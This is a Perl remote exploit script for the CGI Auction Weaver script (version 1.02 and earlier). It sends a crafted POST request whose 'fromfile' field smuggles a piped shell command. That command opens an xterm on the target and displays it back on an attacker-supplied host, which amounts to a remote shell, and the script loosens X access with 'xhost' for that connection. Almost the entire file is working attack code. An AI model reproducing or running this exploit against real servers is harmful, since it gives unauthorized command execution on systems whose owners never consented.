#!/usr/bin/perl

# | Remote exploit for CGI Auction Weaver <= 1.02, CSC
# | Copyright (c) 2000 by <teleh0r@digit-labs.org>
# | All rights reserved.
# |
# | http://www.digit-labs.org/ || digit-labs

use Getopt::Std; getopts('t:a:d:o:', \%args);
use Socket;

if (defined($args{'t'})) { $target   = $args{'t'}; }
if (defined($args{'a'})) { $attacker = $args{'a'}; }
if (defined($args{'d'})) { $dpy      = $args{'d'}; }


if (!(defined($target && $attacker && $dpy))) {
    die("Usage: $0 -t \"target\" -a \"attacker\" -d \"dpy\"\n");
}

if ($dpy !~ /\d/) { die("dpy must be a number"); }

print("\nRemote host: $target\n");
print("CGI-script: /cgi-bin/awl/auctionweaver.pl\n");
print("Command: xterm -ut -display $attacker:$dpy\n\n");

system("xhost + $target");
$length = 362 + length($attacker.$dpy);

$cgicode =
"flag1=1&fromfile=%7Cxterm+-ut+-display+$attacker%3A$dpy".
"%7C&placebid=1&catdir=cat1&username=teleh0r&password=oh".
"baby&bid=Ihavenomoney&nobidite=1&sbutton=BID";

$sploit=
"POST /cgi-bin/awl/auctionweaver.pl HTTP/1.0
Host: $target
Referer: http://teleh0r.cjb.net/
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)
Accept: */*
Accept-Language: en
Accept-Encoding: gzip, deflate, compress, identity
Content-Type: application/x-www-form-urlencoded
Content-length: $length

$cgicode";

$iaddr = inet_aton($target)                   || die("Error: $!\n");
$paddr = sockaddr_in(80, $iaddr)              || die("Error: $!\n");
$proto = getprotobyname('tcp')                || die("Error: $!\n");

socket(SOCKET, PF_INET, SOCK_STREAM, $proto)  || die("Error: $!\n");
connect(SOCKET, $paddr)                       || die("Error: $!\n");
send(SOCKET,"$sploit\015\012", 0)             || die("Error: $!\n");
close(SOCKET);

sleep(10);system("xhost - $target");exit(0);
